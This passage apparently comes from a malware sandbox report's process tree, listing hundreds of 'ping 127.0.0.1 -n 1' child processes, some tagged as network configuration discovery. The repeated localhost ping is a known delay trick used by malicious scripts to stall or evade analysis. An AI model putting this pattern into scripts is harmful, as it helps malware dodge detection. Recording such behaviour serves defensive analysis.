- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11568
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11748
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12360
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12412
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12604
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12744
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12828
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13064
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12912
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13228
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13136
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4912
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13396
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13520
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3360
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13812
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13828
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11820
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4728
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4532
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4344
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4892
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2864
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7220
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7396
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7656
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7816
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8180
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4328
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3716
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8196
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8324
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1968
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8588
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9660
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8584
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10648
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10420
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10780
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9068
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:232
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12620
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12888
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13040
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13124
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:1492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13664
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:968
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4132
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6196
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6304
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6384
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6676
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6780
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6736
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6848
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6908
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7100
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5896
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7276
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8076
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8304
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8544
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8700
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8820
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8844
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9048
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9220
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9396
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9568
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9648
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9704
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9752
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9836
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9904
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10136
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11228
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2972
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11360
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12028
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12072
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5716
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12520
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12432
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12920
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1724
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8380
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8744
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8816
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8904
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:748
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9356
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9392
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9428
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9844
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10656
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:10884
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11520
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11748
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12272
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12476
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12596
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12960
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12932
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12952
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13292
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:72
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13476
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13656
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3144
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5552
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1392
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4632
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4344
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2052
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5048
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7380
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4648
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10676
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2672
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:588
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11612
- C:\Windows\system32\PING.EXE
